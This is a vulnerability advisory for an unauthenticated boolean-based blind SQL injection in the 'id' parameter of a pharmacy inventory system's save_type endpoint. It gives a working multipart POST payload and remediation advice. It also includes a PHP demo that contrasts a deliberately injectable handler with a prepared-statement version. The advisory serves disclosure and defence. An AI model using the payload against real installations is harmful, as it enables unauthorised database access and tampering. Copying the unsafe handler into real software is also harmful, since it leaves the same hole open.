# Vulnerability Summary: SQL Injection in SourceCodester Pharmacy Sales and Inventory System

## Vulnerability Overview

* **Affected Product**: Pharmacy Sales and Inventory System Project V1.0
* **Vulnerability Type**: SQL Injection
* **Vulnerable File**: `/ajax.php?action=save_type`
* **Root Cause**: Attackers inject malicious code via the `id` parameter. Because the input is not validated, it changes the SQL query that the application runs.
* **Exploitation Conditions**: No authentication or authorization is required to exploit this vulnerability.

## Impact Scope

* Attackers can gain unauthorized access to the database.
* This may lead to sensitive data leakage, data tampering, system takeover, or even service disruption.

## Vulnerability Details and POC

**Vulnerable Parameter**: `id`

**Vulnerability Type**: Boolean-based blind

**Payload Code:**

```text
---
Parameter: MULTIPART id ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: -----------------3738858121816587200387936454
Content-Disposition: form-data; name="id"

(SELECT (CASE WHEN (7479=7479) THEN 1 ELSE (SELECT 5293 UNION SELECT 7746) END))
-----------------3738858121816587200387936454
Content-Disposition: form-data; name="name"

1111
-----------------3738858121816587200387936454---
```

## Remediation

1. **Use Prepared Statements and Parameter Binding**: Prepared statements separate SQL code from user input data, preventing SQL injection.
2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize Database User Privileges**: Ensure that the account used to connect to the database has only the minimum necessary privileges, avoiding the use of accounts with elevated privileges (such as root/admin) for daily operations.
4. **Regular Security Audits**: Conduct regular code and system security audits to promptly identify and remediate potential security vulnerabilities.
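
Remediation steps 1 and 2 as an added example, not the project's own code: a hypothetical `save_type` handler in its concatenating form beside a validated, parameter-bound form. The table `type_list`, its columns, the function names and the in-memory SQLite database are assumptions made so the script runs stand-alone; the same prepare-and-bind pattern applies to a MySQL connection.

```php
<?php
declare(strict_types=1);
// Added example. Table "type_list" and its columns are assumptions, not the
// project's schema. SQLite in memory stands in for the application's database.

function save_type_unsafe(PDO $db, array $post): int
{
    // "Before" form: id is pasted into the SQL text, so the server parses it as SQL.
    $sql = "UPDATE type_list SET name = " . $db->quote($post['name'])
         . " WHERE id = " . $post['id'];
    return $db->exec($sql);
}

function save_type_safe(PDO $db, array $post): int
{
    // Validate first: id must be a positive integer, name a short non-empty string.
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    $name = trim((string)($post['name'] ?? ''));
    if ($id === false || $name === '' || strlen($name) > 100) {
        throw new InvalidArgumentException('invalid id or name');
    }
    // Bind both values: they travel as data and never become part of the statement.
    $stmt = $db->prepare('UPDATE type_list SET name = :name WHERE id = :id');
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE type_list (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
$db->exec("INSERT INTO type_list (id, name) VALUES (1, 'Tablet'), (2, 'Syrup')");

// Constructed request: the id value is the boolean test from the report above.
$probe = [
    'id'   => '(SELECT (CASE WHEN (7479=7479) THEN 1 ELSE (SELECT 5293 UNION SELECT 7746) END))',
    'name' => '1111',
];

printf("unsafe: %d row(s) changed\n", save_type_unsafe($db, $probe));
try {
    save_type_safe($db, $probe);
} catch (InvalidArgumentException $e) {
    printf("safe: rejected (%s)\n", $e->getMessage());
}
printf("safe, id=2: %d row(s) changed\n", save_type_safe($db, ['id' => '2', 'name' => 'Capsule']));
```

The unsafe form lets the database evaluate the `id` field as an expression, which is what gives a boolean-based blind test its true/false signal; the safe form rejects the field before any SQL is built.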